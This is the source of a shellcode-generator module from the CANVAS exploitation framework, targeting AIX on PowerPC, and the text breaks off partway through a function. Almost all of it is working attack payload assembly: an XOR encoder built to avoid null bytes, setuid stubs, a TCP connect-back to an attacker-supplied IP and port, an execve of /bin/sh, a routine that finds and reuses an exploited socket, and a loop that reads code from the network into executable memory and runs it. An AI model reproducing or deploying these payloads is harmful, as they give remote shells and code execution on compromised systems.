aixShellcodeGenerator.py
1##ImmunityHeader v1 2###############################################################################3## File : aixShellcodeGenerator.py4## Description: 5## : 6## Created_On : Tue Oct 27 12:00:08 20097## Created_By : Bas Alberts8## Modified_On: 9## Modified_On: Tue Oct 27 12:05:12 200910## Modified_By: Bas Alberts11## (c) Copyright 2009, Immunity Inc all rights reserved.12###############################################################################13#! /usr/bin/env python14#Proprietary CANVAS source code - use only under the license agreement15#specified in LICENSE.txt in your CANVAS distribution16#Copyright Immunity, Inc, 2002-200617#http://www.immunityinc.com/CANVAS/ for more information18import sys19import socket20import struct21sys.path.append('.')22from MOSDEF import GetMOSDEFlibc23from MOSDEF import mosdef24from ppcShellcodeGenerator import ppc as powerpcShellcodeGenerator25from exploitutils import *26from internal import devlog 27import libs.dtspcd_client as dtspcd_client28def get_aix_version(host):29 """ get the AIX uname from dtspcd """30 try:31 dtuname = dtspcd_client.DTSPCDClient(host)32 dtuname.setup()33 unamedict = dtuname.get_uname()34 OS = unamedict['os'].upper()35 if 'AIX' in OS:36 # need to know what an AIX 6 looks like !!!37 version = '5.%d' % int(unamedict['version'])38 return version39 except Exception, msg:40 import traceback41 traceback.print_exc(file=sys.stderr)42 print "[X] could not determine AIX version via DTSPCD .. 
assuming 5.1\n"43 44 return '5.1'45class aix_powerpc(powerpcShellcodeGenerator):46 47 def __init__(self, version = "5.1"):48 powerpcShellcodeGenerator.__init__(self)49 self.libc = GetMOSDEFlibc('AIX', 'powerpc', version)50 self.handlers['sync'] = self.sync51 self.handlers['debug'] = self.trap52 self.handlers["exit"] = self.exit53 self.handlers["read_and_exec_loop"] = self.read_and_exec_loop54 self.handlers["read_and_exec_loop_no_errno"] = self.read_and_exec_loop_no_errno55 self.handlers["GOOOFindSock"] = self.GOOOFindSock56 self.handlers["GOOOFindSock_no_errno"] = self.GOOOFindSock_no_errno57 self.handlers["sendreg"] = self.sendreg58 self.handlers["munmap_caller"] = self.munmap_caller59 self.handlers["flushcache"] = self.flushcache60 self.handlers['setuid'] = self.setuid61 self.handlers['seteuid'] = self.seteuid62 self.handlers['setgid'] = self.setgid63 self.handlers['setegid'] = self.setegid64 self.handlers['setreuid'] = self.setreuid65 self.handlers['execve'] = self.execve66 self.handlers['tcp_connect'] = self.tcp_connect67 # this expects assembled payload ..68 def xor_encode(self, payload, version = '5.1', xormask = 0xfe, debug = False):69 """ return an XOR encoded payload """70 71 encoded = []72 for c in payload:73 encoded.append( "%c" % (ord(c) ^ xormask))74 if ord(c) ^ xormask in [0x00]: # badchars75 devlog("aixshellcode","POSSIBLE BAD CHAR in %X ^ %X" % (ord(c), xormask) )76 encoded = ''.join(encoded)77 safe_size = 178 while (not ((safe_size + len(encoded)) & 0xff00) or \79 not ((safe_size + len(encoded)) & 0x00ff)):80 safe_size += 181 # safe mask that doesn't cause nul bytes82 print "Found safe size of %x" % safe_size83 decoder = """ 84 .start:85 xor. r2,r2,r286 subic. r2,r2,187 cmpwi r2,-188 bgtl .start ! preventing common bad char @89 mflr r1590 addi r15,r15, 0x0145 ! offset 17 * 4 == 0x4491 addi r15,r15,-0x010192 xor r16,r16,r1693 addi r16,r16, 0x%x ! size + 0x010194 addi r16,r16,-0x%x95 .xorloop:96 lbzx r17,r16,r1597 xori r18,r17,0xfe%.2x ! 
XOR98 stbx r18,r16,r1599 subic. r16,r16,1 ! yesh i know .. off by one100 cmpwi r16,-1101 bgtl .xorloop ! preventing common bad char @102 .sync:103 addi r2,r2, 0x%x ! SYS_sync + 0x0101104 addi r2,r2,-0x101105 crorc 6,6,6106 mtlr r15107 .long 0x44ffff02 ! svca 0 .. with no nuls108 .payload:109 """ % ( len(encoded) + safe_size, safe_size, xormask, 0x0101 + int(self.libc.getdefine('SYS_sync'))) 110 decoder = mosdef.assemble(decoder, 'PPC') + encoded111 # dump it for debugging ...112 if debug == True:113 import struct114 i = 0115 print "### pre encoding ###"116 while i < len(payload):117 print "%.8X" % struct.unpack('>L', payload[i:i+4])[0]118 i += 4119 i = 0120 print "### post encoding ###"121 while i < len(decoder):122 print "%.8X" % struct.unpack('>L', decoder[i:i+4])[0]123 i += 4124 return decoder125 def sync(self, args):126 """ sync stub """127 self.code += """128 sync129 isync130 """131 def trap(self, args):132 """ trap stub """133 self.code += """134 trap135 """136 def exit(self, args):137 code="""138 exit:139 li r2, SYS__exit140 crorc 6, 6, 6141 sc142 """143 code = self.libc.patch_defines_with_values(code, ["SYS__exit"])144 self.code += code145 def setuid(self, args):146 code="""147 setuid:148 mflr r20149 li r3, 0x%x150 li r2, SYS_setuid151 addi r20,r20,setuid_out - setuid152 mtlr r20153 crorc 6, 6, 6154 sc155 setuid_out:156 """ % args['uid']157 code = self.libc.patch_defines_with_values(code, ["SYS_setuid"])158 self.code += code159 160 def seteuid(self, args):161 code="""162 seteuid:163 mflr r20164 li r3, 0x%x165 li r2, SYS_seteuid166 addi r20,r20,seteuid_out - seteuid167 mtlr r20168 crorc 6, 6, 6169 sc170 seteuid_out:171 """ % args['uid']172 code = self.libc.patch_defines_with_values(code, ["SYS_seteuid"])173 self.code += code174 def setreuid(self, args):175 code="""176 setreuid:177 mflr r20178 li r3, 0x%x179 li r4, 0x%x180 li r2, SYS_setreuid181 addi r20,r20,setreuid_out - setreuid182 mtlr r20183 crorc 6, 6, 6184 sc185 setreuid_out:186 """ % (args['ruid'], 
args['euid'])187 code = self.libc.patch_defines_with_values(code, ["SYS_setreuid"])188 self.code += code189 190 def setgid(self, args):191 code="""192 setgid:193 mflr r20194 li r3, 0x%x195 li r2, SYS_setgid196 addi r20,r20,setgid_out - setgid197 mtlr r20198 crorc 6, 6, 6199 sc200 setgid_out:201 """ % args['gid']202 code = self.libc.patch_defines_with_values(code, ["SYS_setgid"])203 self.code += code204 205 def setegid(self, args):206 code="""207 setegid:208 mflr r20209 li r3, 1210 li r4, 0x%x211 li r2, SYS_setgidx212 addi r20,r20,setegid_out - setegid213 mtlr r20214 crorc 6, 6, 6215 sc216 setegid_out:217 """ % args['gid']218 code = self.libc.patch_defines_with_values(code, ["SYS_setgidx"])219 self.code += code220 221 # simple tcp connect back222 def tcp_connect(self, args):223 """224aix 5.2:/usr/include/netinet/in.h225struct in_addr {226 in_addr_t s_addr;227};228...229/*230 * Socket address, internet style.231 */232struct sockaddr_in {233 uchar_t sin_len;234 sa_family_t sin_family;235 in_port_t sin_port;236 struct in_addr sin_addr;237 uchar_t sin_zero[8];238};239 """240 if 'ip' not in args.keys() or 'port' not in args.keys():241 print "XXX: missing ip|port arguments!"242 addr = struct.unpack('!L', socket.inet_aton(args['ip']))[0]243 #print "XXX: %X" % addr244 #print "XXX: ip %s" % args['ip']245 #print "XXX: port %d" % args['port']246 code="""247 !trap248 socket:249 mflr r20250 li r3, AF_INET251 li r4, SOCK_STREAM252 li r5, 0253 li r2, SYS_socket254 addi r20,r20,connect - socket255 mtlr r20256 crorc 6, 6, 6257 sc258 connect:259 ! r3 has fd already260 mr r30, r3 ! mosdef expects reg in r30261 stwu r1,-16(r1) ! get stack space262 li r4, 16 263 stb r4, 0(r1) ! sin_len264 li r4, AF_INET265 stb r4, 1(r1) ! sin_family266 li r4, 0x%.4X267 sth r4, 2(r1) ! sin_port268 lis r4, 0x%.4X ! high word of address269 ori r4, r4, 0x%.4X ! low word of address270 stw r4, 4(r1)271 xor. r4, r4, r4272 stw r4, 8(r1) ! sin_zero273 stw r4, 12(r1) ! 
sin_zero274 mr r4, r1275 li r5, 16276 li r2, SYS_connect277 addi r20,r20,connect_out - connect278 mtlr r20279 crorc 6, 6, 6280 sc281 connect_out:282 addi r1, r1, 16 ! restore stack pointer283 284 """ % (args['port'],285 (addr>>16) & 0xffff,286 (addr & 0xffff))287 288 code = self.libc.patch_defines_with_values(code, ['AF_INET',289 'SOCK_STREAM',290 'SYS_socket',291 'SYS_connect'])292 self.code += code293 294 # simple shell execve295 def execve(self, args):296 code="""297 !trap298 execve:299 mflr r20300 addi r3, r20, shell - execve301 stw r3, -8(r1)302 xor r4, r4, r4303 mr r5, r4304 stw r4, -4(r1)305 subi r4, r1, 8306 li r2,SYS_execve307 addi r20, r20, execve_out - execve308 mtlr r20309 crorc 6, 6, 6310 sc311 shell:312 ! 8 byte aligned313 .byte 0x2f314 .byte 0x62315 .byte 0x69316 .byte 0x6e317 .byte 0x2f318 .byte 0x73319 .byte 0x68320 .byte 0x00321 execve_out:322 """323 code = self.libc.patch_defines_with_values(code, ['SYS_execve'])324 self.code += code325 326 def GOOOFindSock(self,args):327 code = """328 ! input:329 ! ------330 ! nothing331 332 ! output:333 ! -------334 ! r30 = fd335 ! r21 = GOOO_pcloc336 337 ! before all asm code (MOSDEF entry point)338 339 GOOOFindSock:340 341 ! get our current location in memory342 xor. r6, r6, r6343 bnel GOOOFindSock344 ! <-- that addr is now in $lr345 GOOO_pcloc:346 mflr r21347 348 ! sync our memory block from cache349 addi r20, r21, sync_out - GOOO_pcloc350 mtlr r20351 li r2, SYS_sync352 crorc 6, 6, 6353 sc354 sync_out:355 356 ! prepare the stack and static values357 ! sp = fp - 9456358 ! sp: [saved regs] [sa(128) 56:184] [fds(1024*8=8192) 184:8376] [buf(1024) 8376:9400] [salen(4) 9400:9404]359 stwu r1, -9456(r1) ! save stack360 addi r22, r1, 184 ! r22:fds ! 8192361 addi r26, r1, 56 ! r26:sa -> buf ! 128 XXX362 addi r23, r1, 8376 ! r23:buf ! 1024363 li r27, 128 ! r27:sizeof(ss)364 lwz r25, 9476(r1) ! 20 + 9456 = 20(sp)365 lwz r25, 64(r25) ! r25:&errno366 mr r29, r22 ! 
r29:pfds = r22:fds367 lis r5, 18255368 ori r24, r5, 20303 ! r24 = "GOOO"369 370 GOOO_main_loop:371 li r28, 0 ! nfds = 0372 li r30, 10 ! for r30:fd_temp = 1024373 374 getpeername_loop:375 stw r27, 9400(r1) ! salen:9400(r1) = *r27376 377 ! getpeername(fd, sa, &salen);378 mr r3, r30 ! arg0 = fd_temp379 addi r4, r1, 56 ! arg1 = sa380 addi r5, r1, 9400 ! arg2 = salen381 addi r20, r21, getpeername_out - GOOO_pcloc382 mtlr r20383 li r2, SYS_ngetpeername384 crorc 6, 6, 6385 sc386 getpeername_out:387 388 cmpwi r3, -1389 bne- getpeername_succeeded ! getpeername() != -1390 ! here getpeername() returned -1391 lwz r3, 0(r25) ! errno392 cmpwi r3, EBADF393 beq- close_badfd_out ! if errno == EBADF, errno != [ENOTSOCK or ENOTCONN]394 395 ! getpeername() returned ENOTSOCK or ENOTCONN -> close fd396 mr r3,r30 ! arg0 = fd_temp397 addi r20, r21, close_badfd_out - GOOO_pcloc398 mtlr r20399 li r2, SYS_close400 crorc 6, 6, 6401 sc402 close_badfd_out:403 404 getpeername_preloop:405 addic. r30, r30, -1 ! fd_temp--406 bge+ getpeername_loop407 408 ! if nfds == 0 smth is wrong409 cmpwi r28, 0 ! nfds == 0 -> GOOO_failed410 beq- GOOO_failed411 412 ! LOOP set events = POLLIN413 mr r29, r22 ! r29:pfds = r22:fds414 ble- poll_set_events_done415 mtctr r28 ! r28:nfds416 li r9, POLLIN ! events = POLLIN417 li r0, 0 ! revents = 0418 poll_set_events:419 sth r9, 4(r29) ! pfds->events = POLLIN420 sth r0, 6(r29) ! pfds->revents = 0421 addi r29, r29, 8 ! pfds++422 bdnz+ poll_set_events423 poll_set_events_done:424 425 call_poll:426 mr r3, r22 ! arg0 = r22:fds427 mr r4, r28 ! arg1 = r28:nfds428 li r5, INF_TIMEOUT429 addi r20, r21, call_poll_out - GOOO_pcloc430 mtlr r20431 li r2, SYS_poll432 crorc 6, 6, 6433 sc434 call_poll_out:435 436 ! check poll() returned -1437 cmpwi r3, -1438 beq- poll_returned_error439 ! check poll() returned 0440 cmpwi r3,0441 beq- GOOO_failed442 443 ! poll() returned something XXX444 mr r29, r22 ! r29:pfds = r22:fds445 li r30, 0 ! for fd_temp = 0446 cmpw r30, r28 ! 
fd_temp < r28:nfds447 bge- GOOO_main_loop448 449 check_next_polled_revents:450 lhz r7, 6(r29) ! r7 = pfds->revents451 ori r6, r7, POLLIN452 cmpwi r6, 0 ! if (pfds->revents | POLLIN)453 bne- revents_IS_POLLIN454 455 revents_isnt_POLLIN:456 addi r30, r30, 1 ! fd_temp++457 addi r29, r29, 8 ! pfds++458 cmpw r30, r28 ! fd_temp < r28:nfds459 blt+ check_next_polled_revents460 b GOOO_main_loop461 462 revents_IS_POLLIN:463 ! read_magic:464 lwz r3, 0(r29) ! arg0 = pfds->fd465 mr r4, r23 ! arg1 = r4 = r23:buf466 li r5, 4 ! arg2 = sizeof(int) = 4467 li r5, 4468 addi r20, r21, read_magic_out - GOOO_pcloc469 mtlr r20470 li r2, SYS_read471 crorc 6, 6, 6472 sc473 read_magic_out:474 475 cmpwi r3,4 ! r == sizeof(MAGIC) - 1476 beq- good_magic_size_read477 478 ! closing bad polled fd479 close_polled_fd_that_didnt_answered_well_to_trigger:480 li r2, SYS_close481 lwz r3,0(r29) ! arg0 = pfds->fd482 addi r20, r21, close_badmagicfd_out - GOOO_pcloc483 mtlr r20484 crorc 6, 6, 6485 sc486 close_badmagicfd_out:487 488 b revents_isnt_POLLIN489 490 good_magic_size_read:491 lwz r9, 8376(r1) ! buf = 8376(r1)492 cmpw r9, r24 ! *lmagic == LMAGIC493 bne+ close_polled_fd_that_didnt_answered_well_to_trigger494 495 ! success MAGIC!496 lwz r30, 0(r29) ! saved_fd = pfds->fd // saving valid_fd497 498 ! reply MAGIC499 mr r3, r30 ! arg0 = fd500 li r5, 4 ! arg2 = 4501 mr r4, r23 ! arg1 = buf502 addi r20, r21, write_trigger_out - GOOO_pcloc503 mtlr r20504 li r2, SYS_write505 crorc 6, 6, 6506 sc507 write_trigger_out:508 509 ! LOOP close all other fd510 ! here r28 = nfds511 mr r29, r22 ! r29 = r22:fds512 cmpwi r28, 0 ! while r < nfds ???513 ble- found_sockfd514 mr r31, r28 ! tmpfd = r31 = nfds515 close_all_but_saved_fd:516 lwz r3, 0(r29) ! arg0 = pfds->fd517 addi r29, r29, 8 ! pfds++518 cmpw r30, r3 ! pfds->fd == saved_fd ?519 beq- do_not_close_the_saved_fd520 ! 
else close!!!521 addi r20, r21, close_all_but_saved_fd_out - GOOO_pcloc522 mtlr r20523 li r2, SYS_close524 crorc 6, 6, 6525 sc526 close_all_but_saved_fd_out:527 do_not_close_the_saved_fd:528 addic. r31, r31, -1 ! tmpfd--529 bne+ close_all_but_saved_fd530 531 b found_sockfd532 533 getpeername_succeeded:534 ! fdflags = fcntl(saved_fd, F_GETFL, 0);535 mr r3, r30 ! arg0 = fd_temp536 li r4, F_GETFL ! arg1537 li r5, 0 ! arg2538 addi r20, r21, fcntl_getsockflags_out1 - GOOO_pcloc539 mtlr r20540 li r2, SYS_fcntl541 crorc 6, 6, 6542 sc543 fcntl_getsockflags_out1:544 545 ! flags in r3546 cmpwi r3, -1547 bne+ fcntl_getsockflags_ok1548 fcntl_getsockflags_failed1:549 li r3, 0550 fcntl_getsockflags_ok1:551 ori r5, r3, O_NONBLOCK ! arg2 = O_NONBLOCK552 553 ! fcntl(saved_fd, F_SETFL, fdflags | O_NONBLOCK);554 mr r3, r30 ! arg0 = fd_temp555 li r4, F_SETFL ! arg1 = F_SETFL556 addi r20, r21, fcntl_out - GOOO_pcloc557 mtlr r20558 li r2, SYS_fcntl559 crorc 6, 6, 6560 sc561 fcntl_out:562 563 addi r28, r28, 1 ! nfds++;564 stw r30, 0(r29) ! pfds->fd = fd;565 addi r29, r29, 8 ! pfds++;566 b getpeername_preloop 567 568 poll_returned_error:569 ! check poll() returned EINTR570 lwz r4, 0(r25) ! errno571 cmpwi r4, EINTR ! errno == EINTR?572 beq- GOOO_main_loop573 ! poll() fatal error574 575 ! _exit(random)576 GOOO_failed:577 li r2, SYS__exit578 crorc 6, 6, 6579 sc580 581 found_sockfd:582 ! out of GOOOFindSock: success583 584 ! fcntl(saved_fd, F_GETFL, 0);585 li r2, SYS_fcntl586 mr r3, r30 ! arg0 = saved_fd587 li r4, F_GETFL ! arg1588 li r5, 0 ! arg2589 addi r20, r21, fcntl_getsockflags_out - GOOO_pcloc590 mtlr r20591 crorc 6, 6, 6592 sc593 fcntl_getsockflags_out:594 595 ! flags in r3596 cmpwi r3, -1597 bne+ fcntl_getsockflags_ok598 fcntl_getsockflags_failed:599 li r3, 0600 fcntl_getsockflags_ok:601 andi. r5, r3, O_BLOCK ! arg2602 603 ! fcntl(saved_fd, F_SETFL, ~O_NONBLOCK);604 li r2, SYS_fcntl605 mr r3, r30 ! arg0 = saved_fd606 li r4, F_SETFL ! 
arg1 = F_SETFL607 addi r20, r21, fcntl_setblock_out - GOOO_pcloc608 mtlr r20609 crorc 6, 6, 6610 sc611 fcntl_setblock_out:612 613 addi r1,r1,9456 ! restore stack614 615 ! here come another code, and $pc continue executing it616 ! remember we have r30 = sockfd617 """618 syscalls = ["SYS_sync", "SYS_ngetpeername", "SYS_poll", "SYS__exit"]619 syscalls += ["SYS_fcntl", "SYS_close", "SYS_read", "SYS_write"]620 constants = ["EBADF", "EINTR", "POLLIN", "INF_TIMEOUT", "F_GETFL", "F_SETFL", "O_NONBLOCK", "O_BLOCK"]621 code = self.libc.patch_defines_with_values(code, syscalls + constants)622 self.code+=code623 624 # for when you hose errno loc on stack ovf625 def GOOOFindSock_no_errno(self,args):626 code = """627 ! input:628 ! ------629 ! nothing630 631 ! output:632 ! -------633 ! r30 = fd634 ! r21 = GOOO_pcloc635 636 ! before all asm code (MOSDEF entry point)637 638 GOOOFindSock:639 640 ! get our current location in memory641 xor. r6, r6, r6642 bnel GOOOFindSock643 ! <-- that addr is now in $lr644 GOOO_pcloc:645 mflr r21646 647 ! sync our memory block from cache648 addi r20, r21, sync_out - GOOO_pcloc649 mtlr r20650 li r2, SYS_sync651 crorc 6, 6, 6652 sc653 sync_out:654 655 ! prepare the stack and static values656 ! sp = fp - 9456657 ! sp: [saved regs] [sa(128) 56:184] [fds(1024*8=8192) 184:8376] [buf(1024) 8376:9400] [salen(4) 9400:9404]658 stwu r1, -9456(r1) ! save stack659 addi r22, r1, 184 ! r22:fds ! 8192660 addi r26, r1, 56 ! r26:sa -> buf ! 128 XXX661 addi r23, r1, 8376 ! r23:buf ! 1024662 li r27, 128 ! r27:sizeof(ss)663 mr r29, r22 ! r29:pfds = r22:fds664 lis r5, 18255665 ori r24, r5, 20303 ! r24 = "GOOO"666 667 GOOO_main_loop:668 li r28, 0 ! nfds = 0669 li r30, 10 ! for r30:fd_temp = 1024670 671 getpeername_loop:672 stw r27, 9400(r1) ! salen:9400(r1) = *r27673 674 ! getpeername(fd, sa, &salen);675 mr r3, r30 ! arg0 = fd_temp676 addi r4, r1, 56 ! arg1 = sa677 addi r5, r1, 9400 ! 
arg2 = salen678 addi r20, r21, getpeername_out - GOOO_pcloc679 mtlr r20680 li r2, SYS_ngetpeername681 crorc 6, 6, 6682 sc683 getpeername_out:684 685 cmpwi r3, -1686 bne- getpeername_succeeded ! getpeername() != -1687 688 getpeername_preloop:689 addic. r30, r30, -1 ! fd_temp--690 bge+ getpeername_loop691 692 ! if nfds == 0 smth is wrong693 cmpwi r28, 0 ! nfds == 0 -> GOOO_failed694 beq- GOOO_failed695 696 ! LOOP set events = POLLIN697 mr r29, r22 ! r29:pfds = r22:fds698 ble- poll_set_events_done699 mtctr r28 ! r28:nfds700 li r9, POLLIN ! events = POLLIN701 li r0, 0 ! revents = 0702 poll_set_events:703 sth r9, 4(r29) ! pfds->events = POLLIN704 sth r0, 6(r29) ! pfds->revents = 0705 addi r29, r29, 8 ! pfds++706 bdnz+ poll_set_events707 poll_set_events_done:708 709 call_poll:710 mr r3, r22 ! arg0 = r22:fds711 mr r4, r28 ! arg1 = r28:nfds712 li r5, INF_TIMEOUT713 addi r20, r21, call_poll_out - GOOO_pcloc714 mtlr r20715 li r2, SYS_poll716 crorc 6, 6, 6717 sc718 call_poll_out:719 720 ! check poll() returned -1721 cmpwi r3, -1722 beq- poll_returned_error723 ! check poll() returned 0724 cmpwi r3,0725 beq- GOOO_failed726 727 ! poll() returned something XXX728 mr r29, r22 ! r29:pfds = r22:fds729 li r30, 0 ! for fd_temp = 0730 cmpw r30, r28 ! fd_temp < r28:nfds731 bge- GOOO_main_loop732 733 check_next_polled_revents:734 lhz r7, 6(r29) ! r7 = pfds->revents735 ori r6, r7, POLLIN736 cmpwi r6, 0 ! if (pfds->revents | POLLIN)737 bne- revents_IS_POLLIN738 739 revents_isnt_POLLIN:740 addi r30, r30, 1 ! fd_temp++741 addi r29, r29, 8 ! pfds++742 cmpw r30, r28 ! fd_temp < r28:nfds743 blt+ check_next_polled_revents744 b GOOO_main_loop745 746 revents_IS_POLLIN:747 ! read_magic:748 lwz r3, 0(r29) ! arg0 = pfds->fd749 mr r4, r23 ! arg1 = r4 = r23:buf750 li r5, 4 ! arg2 = sizeof(int) = 4751 li r5, 4752 addi r20, r21, read_magic_out - GOOO_pcloc753 mtlr r20754 li r2, SYS_read755 crorc 6, 6, 6756 sc757 read_magic_out:758 759 cmpwi r3,4 ! 
r == sizeof(MAGIC) - 1760 beq- good_magic_size_read761 762 ! closing bad polled fd763 close_polled_fd_that_didnt_answered_well_to_trigger:764 li r2, SYS_close765 lwz r3,0(r29) ! arg0 = pfds->fd766 addi r20, r21, close_badmagicfd_out - GOOO_pcloc767 mtlr r20768 crorc 6, 6, 6769 sc770 close_badmagicfd_out:771 772 b revents_isnt_POLLIN773 774 good_magic_size_read:775 lwz r9, 8376(r1) ! buf = 8376(r1)776 cmpw r9, r24 ! *lmagic == LMAGIC777 bne+ close_polled_fd_that_didnt_answered_well_to_trigger778 779 ! success MAGIC!780 lwz r30, 0(r29) ! saved_fd = pfds->fd // saving valid_fd781 782 ! reply MAGIC783 mr r3, r30 ! arg0 = fd784 li r5, 4 ! arg2 = 4785 mr r4, r23 ! arg1 = buf786 addi r20, r21, write_trigger_out - GOOO_pcloc787 mtlr r20788 li r2, SYS_write789 crorc 6, 6, 6790 sc791 write_trigger_out:792 793 ! LOOP close all other fd794 ! here r28 = nfds795 mr r29, r22 ! r29 = r22:fds796 cmpwi r28, 0 ! while r < nfds ???797 ble- found_sockfd798 mr r31, r28 ! tmpfd = r31 = nfds799 close_all_but_saved_fd:800 lwz r3, 0(r29) ! arg0 = pfds->fd801 addi r29, r29, 8 ! pfds++802 cmpw r30, r3 ! pfds->fd == saved_fd ?803 beq- do_not_close_the_saved_fd804 ! else close!!!805 addi r20, r21, close_all_but_saved_fd_out - GOOO_pcloc806 mtlr r20807 li r2, SYS_close808 crorc 6, 6, 6809 sc810 close_all_but_saved_fd_out:811 do_not_close_the_saved_fd:812 addic. r31, r31, -1 ! tmpfd--813 bne+ close_all_but_saved_fd814 815 b found_sockfd816 817 getpeername_succeeded:818 ! fdflags = fcntl(saved_fd, F_GETFL, 0);819 mr r3, r30 ! arg0 = fd_temp820 li r4, F_GETFL ! arg1821 li r5, 0 ! arg2822 addi r20, r21, fcntl_getsockflags_out1 - GOOO_pcloc823 mtlr r20824 li r2, SYS_fcntl825 crorc 6, 6, 6826 sc827 fcntl_getsockflags_out1:828 829 ! flags in r3830 cmpwi r3, -1831 bne+ fcntl_getsockflags_ok1832 fcntl_getsockflags_failed1:833 li r3, 0834 fcntl_getsockflags_ok1:835 ori r5, r3, O_NONBLOCK ! arg2 = O_NONBLOCK836 837 ! fcntl(saved_fd, F_SETFL, fdflags | O_NONBLOCK);838 mr r3, r30 ! 
arg0 = fd_temp839 li r4, F_SETFL ! arg1 = F_SETFL840 addi r20, r21, fcntl_out - GOOO_pcloc841 mtlr r20842 li r2, SYS_fcntl843 crorc 6, 6, 6844 sc845 fcntl_out:846 847 addi r28, r28, 1 ! nfds++;848 stw r30, 0(r29) ! pfds->fd = fd;849 addi r29, r29, 8 ! pfds++;850 b getpeername_preloop 851 852 poll_returned_error:853 ! poll() fatal error? deal with EINTR, but no errno!854 855 ! _exit(random)856 GOOO_failed:857 li r2, SYS__exit858 crorc 6, 6, 6859 sc860 861 found_sockfd:862 ! out of GOOOFindSock: success863 864 ! fcntl(saved_fd, F_GETFL, 0);865 li r2, SYS_fcntl866 mr r3, r30 ! arg0 = saved_fd867 li r4, F_GETFL ! arg1868 li r5, 0 ! arg2869 addi r20, r21, fcntl_getsockflags_out - GOOO_pcloc870 mtlr r20871 crorc 6, 6, 6872 sc873 fcntl_getsockflags_out:874 875 ! flags in r3876 cmpwi r3, -1877 bne+ fcntl_getsockflags_ok878 fcntl_getsockflags_failed:879 li r3, 0880 fcntl_getsockflags_ok:881 andi. r5, r3, O_BLOCK ! arg2882 883 ! fcntl(saved_fd, F_SETFL, ~O_NONBLOCK);884 li r2, SYS_fcntl885 mr r3, r30 ! arg0 = saved_fd886 li r4, F_SETFL ! arg1 = F_SETFL887 addi r20, r21, fcntl_setblock_out - GOOO_pcloc888 mtlr r20889 crorc 6, 6, 6890 sc891 fcntl_setblock_out:892 893 addi r1,r1,9456 ! restore stack894 895 ! here come another code, and $pc continue executing it896 ! remember we have r30 = sockfd897 """898 syscalls = ["SYS_sync", "SYS_ngetpeername", "SYS_poll", "SYS__exit"]899 syscalls += ["SYS_fcntl", "SYS_close", "SYS_read", "SYS_write"]900 constants = ["EBADF", "EINTR", "POLLIN", "INF_TIMEOUT", "F_GETFL", "F_SETFL", "O_NONBLOCK", "O_BLOCK"]901 code = self.libc.patch_defines_with_values(code, syscalls + constants)902 self.code+=code903 904 def read_and_exec_loop_no_errno(self, args):905 """ use this on stack overflows that break errno loc! 
"""906 907 mmap_protections = self.libc.getdefine('PROT_EXEC')908 mmap_protections |= self.libc.getdefine('PROT_READ')909 mmap_protections |= self.libc.getdefine('PROT_WRITE')910 911 # we want to see if our 'fd' argument is a number or a register912 try:913 fd = int(args["fd"])914 fd_set_instr = "li"915 except ValueError:916 # i hope we got a register917 fd_set_instr = "mr"918 919 code = """920 ! r30 = fd921 ! r31 = codebuf // mmap922 ! r29 = bufsize923 ! r21 = pcloc924 ! r28 = codeptr925 ! r20 = tmp926 ! r18 = main_loop927 928 ! before all asm code (MOSDEF entry point)929 read_and_exec_loop:930 931 ! get our current location in memory932 xor. r6, r6, r6933 bnel read_and_exec_loop934 ! <-- that addr is now in $lr935 pcloc:936 mflr r21937 938 """939 940 # if fd is already in $r30 we wont set it again just because it's nicer941 # but we also save 4 bytes!!!942 if str(args["fd"]) != "r30":943 code += """944 ! set provided sockfd945 FD_SET_INSTR r30, FD ! fd946 """947 code += """948 949 ! mmap(0, 0x10000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANON, -1, 0);950 li r3, 0951 lis r4, 1952 li r5, mmap_protections953 li r6, MAP_ANON954 li r7, -1955 mr r8, r3956 addi r20, r21, mmap_out - pcloc957 mtlr r20958 li r2, SYS_mmap959 crorc 6, 6, 6960 sc961 mmap_out:962 963 cmpwi r3, MAP_FAILED964 beq- failed965 mr r31, r3 ! r31 = codebuf966 967 ! save <here> in r18 to come back directly here after exec the mmap buffer968 addi r18, r21, main_loop - pcloc969 970 main_loop:971 972 ! set the first instruction of the mmap buffer: restore lr from r18973 set r28, restore_lr_after_jmp - pcloc974 lwzx r28, r21, r28975 stw r28, 0(r31)976 977 ! read(FD, &nbytes, sizeof(nbytes));978 read_size:979 mr r3, r30 ! r30 = sockfd980 addi r4, r31, 4 ! &mmap[4]981 li r5, 4982 addi r20, r21, readsize_out - pcloc983 mtlr r20984 li r2, SYS_kread985 crorc 6, 6, 6986 sc987 readsize_out:988 989 cmplwi r3, 4 ! 
if (r != sizeof(nbytes))990 beq+ readsize_is_4_valid991 b failed992 readsize_is_4_valid:993 lwz r29, 4(r31) ! r29 = *mmap[4] = codesize994 995 ! prepare r28 before read loop996 addi r28, r31, 4 ! r28 = mmap_ptr = &mmap[4]997 998 ! read(FD, codeptr, nbytes);999 read_buf:1000 cmpwi r29, 0 ! while (nbytes) ! do we still need to read some bytes?1001 beq- exec_code ! if no, we can exec the recently read code1002 mr r3, r30 ! arg0 = r30 = sockfd1003 mr r4, r28 ! arg1 = mmap_ptr1004 mr r5, r29 ! arg2 = codesize1005 addi r20, r21, read_out - pcloc1006 mtlr r201007 li r2, SYS_kread1008 crorc 6, 6, 61009 sc1010 read_out:1011 1012 cmpwi r3, 01013 bgt+ read_out_ok ! we read smth1014 b failed ! no errno support on stack overflows1015 read_out_ok:1016 add r28, r28, r3 ! mmap_ptr += read_size1017 subfc r29, r3, r29 ! codesize -= read_size1018 bne- read_buf ! if codesize != 0: continue to read on sockfd1019 1020 exec_code:1021 mtlr r311022 li r2, SYS_sync1023 crorc 6, 6, 61024 sc1025 1026 ! _exit(random)1027 failed:1028 li r2, SYS__exit1029 crorc 6, 6, 61030 sc1031 1032 ! never reached1033 1034 ! 
following is used to patch sent code1035 restore_lr_after_jmp:1036 mtlr r181037 """1038 syscalls = ["SYS_mmap", "SYS_kread", "SYS__exit", "SYS_sync"]1039 constants = ["MAP_ANON", "MAP_FAILED"]1040 code = self.libc.patch_defines_with_values(code, syscalls + constants)1041 code = code.replace('mmap_protections', "%s" % mmap_protections)1042 code = code.replace("FD_SET_INSTR", fd_set_instr)1043 code = code.replace("FD", str(args["fd"]))1044 self.code+=code1045 1046 def read_and_exec_loop(self, args):1047 1048 mmap_protections = self.libc.getdefine('PROT_EXEC')1049 mmap_protections |= self.libc.getdefine('PROT_READ')1050 mmap_protections |= self.libc.getdefine('PROT_WRITE')1051 1052 # we want to see if our 'fd' argument is a number or a register1053 try:1054 fd = int(args["fd"])1055 fd_set_instr = "li"1056 except ValueError:1057 # i hope we got a register1058 fd_set_instr = "mr"1059 1060 code = """1061 ! r30 = fd1062 ! r31 = codebuf // mmap1063 ! r29 = 